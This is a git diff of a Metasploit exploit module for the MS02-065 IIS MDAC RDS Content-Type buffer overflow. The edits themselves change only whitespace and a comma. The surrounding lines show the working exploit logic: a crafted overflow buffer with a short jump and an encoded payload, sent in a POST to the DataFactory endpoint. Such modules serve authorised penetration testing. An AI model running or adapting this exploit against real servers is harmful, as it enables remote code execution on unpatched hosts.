diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index d89f4306b6..435fd68ec0 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( 'Name' => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow', - 'Description' => %q{ + 'Description' => %q{ This module can be used to execute arbitrary code on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service. The service is @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote ['BID', '6214'], ['CVE', '2002-1142'], ['MSB', 'ms02-065'], - ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'], + ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'] ], 'Privileged' => false, 'Payload' => @@ -79,10 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote else Exploit::CheckCode::Safe end - - end - + def exploit sploit = rand_text_alphanumeric(136) sploit[24,2] = Rex::Arch::X86.jmp_short(117) @@ -90,14 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote sploit << payload.encoded data = 'Content-Type: ' + sploit - + res = send_request_raw({ 'uri' => datastore['PATH'] + '/AdvancedDataFactory.Query', 'headers' => { 'Content-Length' => data.length, }, - + 'method' => 'POST', 'data' => data, })